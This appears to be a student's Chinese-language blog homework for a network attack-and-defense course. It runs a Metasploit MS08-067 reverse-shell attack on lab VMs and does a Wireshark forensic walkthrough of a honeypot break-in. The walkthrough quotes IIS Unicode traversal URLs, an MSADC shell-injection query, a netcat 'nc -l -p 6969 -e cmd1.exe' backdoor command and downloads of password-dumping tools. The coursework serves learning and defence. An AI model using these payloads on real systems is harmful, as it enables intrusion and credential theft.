20252914 2025-2026-2 《网络攻防实践》第6次作业

20252914 2025-2026-2 《网络攻防实践》第6周作业

1.知识点梳理与总结

1. 核心工具

Metasploit Framework(MSF):一款开源渗透测试框架,集成漏洞利用模块、 payload(攻击载荷)、辅助工具,可快速实现漏洞扫描、渗透攻击及权限维持,支持Windows、Linux等多系统攻击场景;BT4(BackTrack4):集成各类渗透测试工具的Linux发行版,常作为攻击机使用;Windows Metasploitable:含多种已知漏洞的Windows靶机,用于渗透测试练习,本次实验重点针对其MS08-067漏洞。

2. 关键漏洞:MS08-067

微软Windows系统Server Service远程代码执行漏洞(CVE-2008-4250),影响Windows 2000/XP/Server 2003等系统;漏洞成因是Server服务在处理SMB协议请求时存在缓冲区溢出,攻击者可发送恶意构造的请求,执行任意代码,进而获取目标主机访问权。

3. 核心概念

Payload(攻击载荷):攻击者植入靶机的恶意代码,用于实现特定功能(如获取会话、反弹shell);Meterpreter:MSF内置的交互式shell,可实现远程控制、信息收集、权限提升等操作;SMB协议:服务器消息块协议,用于Windows系统间文件、打印机等资源共享,也是本次漏洞的攻击入口。

4. 渗透攻击核心逻辑

信息探测→漏洞发现→漏洞利用→权限获取→权限维持→痕迹清理;2. 取证分析核心:提取攻击日志、网络流量、系统进程痕迹,还原攻击全过程,定位攻击者行为和工具;3. 安全核心原则:预防为主(补丁、防护)、监测为辅(日志、监控)、快速响应(漏洞修复、攻击处置)。

2.实验过程

一、使用metasploit软件进行windows远程渗透统计实验

修改win2kserver虚拟机IP,使其与攻击机kali处于同一网段,以确保连通性:
image
image

打开kali攻击机,输入以下指令:
su - root #进入root权限
service postgresql start #启动 PostgreSQL 数据库服务
msfdb init #初始化 Metasploit 数据库
msfconsole #启动 Metasploit 控制台
image
输入指令 search ms08_067 搜索 MS08-067 漏洞利用模块:
image
可以看到其位置为 exploit/windows/smb/ms08_067_netapi
接下来执行指令 use exploit/windows/smb/ms08_067_netapi 加载该模块:
image
加载模块后,必须设置以下内容才能攻击:

  1. 目标主机 IP
  2. 攻击载荷(Payload),作用:让靶机反向连接攻击机,获得远程控制权限
  3. 攻击机监听 IP

set RHOSTS 192.168.200.9
set LHOST 192.168.200.6
set payload generic/shell_reverse_tcp
最后输入exploit发起攻击:
image
image
攻击成功!

二、取证分析实践:解码一次成功的NT系统破解攻击

将 snort-0204@0117.log 文件复制到kali机中,使用wireshark打开:
image

Wireshark 默认颜色含义(抓包列表里的颜色)

  1. 绿色
    TCP 正常流量(比如:HTTP、HTTPS、SMB、RDP 等基于 TCP 的正常通信)
  2. 蓝色
    DNS 流量(查询、响应)(比如:端口 53,域名解析包)
  3. 紫色
    UDP 正常流量(比如:DNS(也走 UDP)、SNMP、NTP、流媒体等)
  4. 红色
    异常 / 错误 / 危险包(常见:TCP 重传、重复 ACK、乱序包、RST(连接被强制断开)、端口扫描、攻击探测包)
  5. 黑色
    校验和错误 / 损坏包 / 严重错误,基本是无效包、干扰包、损坏包
  6. 灰色 / 白色
    默认色:没匹配任何着色规则的普通包
  7. 黄色 / 橙色
    ICMP、ARP、路由协议(比如 ping(ICMP echo)、ARP 解析)

image

根据红色流量包的IP,使用条件 ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && tcp.port == 80 筛选 Web 攻击(IIS 漏洞、Unicode 遍历):
image

使用条件 ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && tcp.port == 139 || tcp.port == 445 筛选 Windows 系统漏洞攻击(SMB、远程命令执行):
image

使用条件 ip.src == 213.116.251.162 && ip.dst == 172.16.1.106 && udp.port == 69 筛选命令行、文件传输后门行为(TFTP):
image

对编号2、3、4……的 TCP 会话通信流追踪分析(tcp.stream eq 2、3、4……):
image

  1. AI对编号2的 TCP 会话通信分析:靶机环境判定:
    目标主机 lab.wiretrip.net(172.16.1.106)运行Windows NT/Windows 2000 老旧系统,搭载IIS 老旧 Web 服务;网页架构、外链、安全站点聚合特征,高度符合蜜罐主机特征;系统、中间件、Web 组件年代久远,存在大量经典高危漏洞:IIS Unicode 目录遍历、.ida/.idq 溢出、远程命令执行等,极易被攻破。
  2. 流量行为分析:
    该条流量为正常静态资源访问(加载图片),是攻击者入侵前的信息探测、站点踩点行为;攻击者先访问目标首页、抓取页面内容、收集站点指纹、服务器版本、Web 架构;通过页面外链、建站背景,攻击者可快速识别:这是一台安全测试蜜罐 / 黑客研究服务器。
  3. 结合本次攻击背景(212.116.251.162 攻击者)
    此 HTTP 流量属于攻击前期侦察阶段:访问 80 端口、爬取首页、收集 Web 服务信息,为后续 IIS 漏洞利用做准备;页面暴露大量早期安全漏洞研究组织链接,攻击者可直接判断此机器为 rfp 部署的蜜罐,而非普通办公 / 业务主机;后续攻击者会针对该老旧 IIS+NT 系统,发起 Unicode 漏洞、命令注入等攻击,最终拿下系统权限。

image
编号为7的 TCP 会话通信流追踪分析:
核心攻击流量(关键恶意请求)
恶意攻击 URL
plaintext
GET /guest/default.asp/..%C0%AF../..%C0%AF../..%C0%AF../boot.ini

  1. 漏洞原理
    利用 IIS 4.0 Unicode 目录遍历漏洞
    %C0%AF 是 Unicode 畸形编码的
    等效于:../../../../ 跨目录跳转
    绕过 IIS 路径访问限制,突破 Web 站点根目录,访问系统磁盘根目录文件
  2. 攻击目的
    读取系统关键文件:boot.ini
    boot.ini 是 Windows NT 系统启动配置文件;
    可直接确认:系统版本、系统安装路径、分区信息,证明远程任意文件读取漏洞存在。
  3. 服务器响应结果(攻击成功)
    IIS 返回 HTTP/1.1 200 OK,并直接明文返回:
    plaintext
    [boot loader]
    timeout=30
    default=multi(0)disk(0)rdisk(0)partition(1)\WINNT
    [operating systems]
    Windows NT Server 4.00 系统版本信息

接着筛选http.request.uri contains "msadc"(msadc 是 IIS 经典高危漏洞利用点):
image

对 tcp.stream eq 11 的 TCP 会话通信进行分析:
image

  1. 核心攻击原理拆解
    攻击者利用 msadcs.dll 恶意查询注入
    通过构造畸形数据库查询语句,绕过组件限制,调用系统 Shell
    关键恶意代码:
    plaintext
    shell("cmd /c echo werd >> c:\fun")
    cmd /c:调用 Windows 系统命令行
    echo werd >> c:\fun
    在C 盘根目录创建 / 写入文件 fun,写入内容 werd
    利用 Access 数据库驱动拼接恶意指令,借助 ADF 查询接口执行系统命令
  2. 流量细节解读
    请求方式 POST
    恶意攻击大多用 POST 携带大量恶意载荷,避开简单 URL 过滤。
    特殊分割符
    plaintext
    boundary=!ADM!ROX!YOUR!WORLD!
    是该漏洞攻击工具固定特征签名,Snort 入侵检测会直接捕获该特征并告警。3. 载荷包裹在数据库查询语句内
    plaintext
    Select * from Customers where City='|shell(命令)|'
    利用单引号闭合 + 管道符,注入系统 shell 命令。
  3. 服务器响应结果
    plaintext
    HTTP/1.1 200 OK
    状态码 200 = 攻击执行成功
    服务端没有拒绝、没有报错,恶意 cmd 命令正常执行
    成功在目标 Windows NT 主机 C:\ 下生成 fun 落地文件

接下来是tcp.stream eq 109:
image

漏洞复用%C0%AF = 畸形 Unicode 反斜杠 \利用 IIS 4.0 Unicode 目录遍历漏洞,连续多层 ..%C0%AF.. 实现跨目录向上穿越,跳出网站根目录,访问系统真实路径。
访问危险组件程序穿越到系统目录:program files/common files/system/msadc/调用漏洞工具 cmd1.exe,属于 IIS/MSADC 高危后门命令执行程序。
/c+nc+-l+-p+6969+-e+cmd1.exe整体作用:在靶机(Windows NT)上主动开启 6969 端口监听,搭建后门服务,攻击者后续可通过 nc 连接 6969 端口,直接获取持久化系统命令行控制权。

tcp.stream eq 106:
image

  1. 身份认证
    plaintext
    USER johna2k
    PASS haxedj00
    230 User logged in
    攻击者使用预设弱口令 / 公开账号密码,直接登录 FTP 服务器,认证成功。
  2. 主动模式传输PORT 172,16,1,106...使用 FTP 主动模式,指定靶机自身 IP 与临时端口,进行文件下载。
  3. 恶意工具下载(核心行为)攻击者从 FTP 服务器下载 3 款渗透工具:
    nc.exe:Netcat,网络工具,反弹 Shell、端口监听、后门维持核心工具
    pdump.exe:进程抓取 / 内存导出工具
    samdump.dll:系统账号密码抓取组件,用于读取 Windows SAM 哈希、窃取管理员密码
  4. 会话结束
    QUIT 正常退出 FTP 连接,工具全部落地到靶机本地。

tcp.stream eq 178:
image
image

echo best honeypot i've seen till now 😃 > rfp.txt表明攻击者已经识别出他的目标是蜜罐主机

问题回答:

  1. 攻击者使用了什么破解工具 / 攻击手段
    利用IIS 4.0 Unicode 目录遍历漏洞、MSADC 组件 msadcs.dll 远程命令执行漏洞;
    结合系统内置组件与黑客工具:
    cmd1.exe:系统命令执行程序
    nc.exe(Netcat):端口监听、反弹后门工具
    pdump.exe、samdump.dll:进程抓取、系统账号密码抓取工具
    依托老旧 Serv-U FTP 服务 传输恶意工具文件。
  2. 攻击者如何使用工具进入并控制系统
    前期踩点访问目标网站,探测到靶机为Windows NT 4.0 + IIS 4.0老旧高危环境;
    利用 Unicode 编码绕过(% C0% AF) 构造跨目录遍历请求,穿越网站根目录,读取系统敏感文件(boot.ini),确认系统环境;
    利用 MSADC 组件漏洞 注入数据库恶意语句,调用 cmd 命令实现远程代码执行,完成初步命令写入与执行;
    继续通过恶意 URL 调用 cmd1.exe,启动 Netcat 监听端口,搭建远程后门;
    利用 FTP 弱账号密码登录,下载 nc、密码抓取等黑客工具,全面获取系统操作控制权。
  3. 攻击者获得权限后做了什么
    读取系统核心配置文件,收集系统版本、分区等关键信息;
    执行系统命令,在服务器本地写入文件,验证命令执行权限;
    部署 Netcat 后门,开放监听端口,实现持久化远程控制;
    通过 FTP 下载进程抓取、SAM 密码导出等工具,为提权、窃取账号密码做准备;
    完整完成漏洞利用、工具落地、后门留存的整套入侵操作。
  4. 如何防止此类攻击
    及时修复 Windows NT、IIS 服务高危补丁,修复 Unicode 目录遍历、MSADC 远程执行等历史漏洞;
    禁用 IIS 多余危险组件(MSADC)、删除 cmd1.exe 等高危可执行程序,关闭无用服务;
    关闭不必要的 FTP 服务,杜绝弱口令、匿名登录,严格限制文件传输权限;
    部署防火墙与 IDS(Snort)、WAF 设备,拦截畸形 Unicode 请求、msadc 攻击特征、恶意后门流量;
    采用最小权限原则,限制 Web 服务进程权限,禁止调用系统 cmd、写入系统目录;
    定期日志审计,监控异常文件下载、陌生端口监听、远程命令执行行为。

三、团队对抗实践:windows系统远程渗透攻击和分析

将kali攻击机的网络适配器中的网络连接更改为桥接模式:
image
IP更改为192.168.31.241

靶机为吴岳峰的Win2kserver,攻击方式为任务一中的“使用windows Attacker/BT4攻击机尝试对windows Metasploitable靶机上的MS08-067漏洞进行远程渗透攻击,获取目标主机的访问权”
靶机IP为:192.168.31.22
设置以下参数:
set RHOSTS 192.168.31.22
set LHOST 192.168.31.241
set payload generic/shell_reverse_tcp
image
image

wireshark抓包如下(ip.src == 192.168.31.241 && ip.dst == 192.168.31.22):
image
tcp.stream eq 2 追踪TCP流:
image

3.学习中遇到的问题及解决

暂无

4.学习感悟

通过本次 Metasploit 渗透攻击与 NT 系统入侵取证实验,我直观了解了漏洞利用、远程攻击与网络取证的完整流程。认识到老旧系统、未修复漏洞、不安全服务配置是网络入侵的主要突破口,攻击者可利用目录遍历、组件漏洞、弱口令等多种手段逐步获取系统权限。同时,我掌握了 Wireshark 流量分析、Snort 日志查看、TCP 会话追踪的基础方法,学会从网络流量中梳理攻击行为、还原入侵全过程。深刻体会到网络安全防御的重要性,漏洞补丁、服务最小化配置、流量监控与日志审计,都是抵御恶意攻击的关键。

参考资料

《Java程序设计与数据结构教程(第二版)》
《Java程序设计与数据结构教程(第二版)》学习指导

posted @ 2026-04-27 16:19  20252914  阅读(28)  评论(0)    收藏  举报